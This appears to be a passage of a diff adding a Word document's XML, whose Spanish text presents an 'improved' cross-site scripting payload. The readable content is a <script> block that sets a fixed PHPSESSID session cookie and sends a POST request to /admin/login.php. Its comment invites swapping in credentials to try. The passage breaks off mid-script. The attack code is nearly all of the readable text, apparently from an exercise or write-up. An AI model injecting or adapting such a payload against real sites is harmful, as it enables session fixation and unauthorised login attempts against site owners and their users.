+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mejora de código, aprovechando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>aun</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>mas</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vulnerabilidades XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="696969"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B67352"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>div</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="696969"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="696969"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B67352"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="696969"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>    // Establecer la cookie de sesión</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "PHPSESSID=bpu0b846jkl6d6ih8f5vc79cb4; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=/";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    // Intentar enviar una petición AJAX al </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>endpoint</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de inicio de sesión</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>xhr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>XMLHttpRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>xhr.open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>("POST", "/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>login.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>", true);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>xhr.setRequestHeader</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>("Content-Type", "application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>// Reemplaza 'admin' y 'password' con las credenciales que quieras probar</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
